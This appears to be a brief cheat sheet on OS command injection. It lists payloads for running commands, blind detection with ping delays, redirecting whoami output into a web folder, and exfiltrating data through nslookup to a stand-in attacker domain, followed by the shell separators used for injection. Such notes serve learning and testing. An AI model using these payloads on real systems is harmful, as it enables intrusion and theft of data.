OS command injection
Whenever a web app calls out to OS commands (e.g. via a pearl script), malicious commands may be injected. This can potentially lead to a full compromise of the system.
Executing arbitrary commands
param=& echo test &
param=1|echo test
Blind command injections
Detecting vulnerabilities using time delays
& ping -c 10 127.0.0.1 &
Exploiting vulnerabilities by redirecting output
& whoami > /var/www/static/whoami.txt &
Exploiting vulnerabilities using out-of-band (OAST) techniques
& nslookup kgji2ohoyw.web-attacker.com &
Exfiltrate data
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
Ways of injection
Command separators
Windows and Unix:
&
&&
|
||
Unix only:
;
Newline:
0x0a
orBackticks:
`command`
Dollar character:
$(command)
Last updated